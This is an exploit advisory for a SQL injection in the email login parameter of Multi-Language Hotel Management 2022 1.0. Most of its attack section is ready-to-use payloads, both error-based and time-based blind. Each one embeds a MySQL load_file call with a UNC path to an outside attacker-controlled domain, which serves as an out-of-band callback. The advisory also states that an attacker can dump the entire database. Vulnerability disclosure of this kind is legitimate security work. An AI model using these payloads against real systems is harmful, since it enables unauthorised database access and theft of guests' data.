Multi-Language Hotel Management 2022 1.0 SQL Injection

## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi## Author: nu11secur1ty## Date: 08.03.2022## Vendor: https://www.nikhilbhalerao.com/## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022## Description:The `email` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'was submitted in the email parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can easily get the all database from this hotel systemand can do very malicious stuff with the users who are inside of thissystem.Status: CRITICAL[+] Payloads:```mysql---Parameter: email (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: [email protected]'+(selectload_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECTCOUNT(*),CONCAT(0x7162787671,(SELECT(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BYx)a))||'&password=m5S!k0l!S6&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: [email protected]'+(selectload_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)## Proof and Exploit:[href](https://streamable.com/uk7zq2)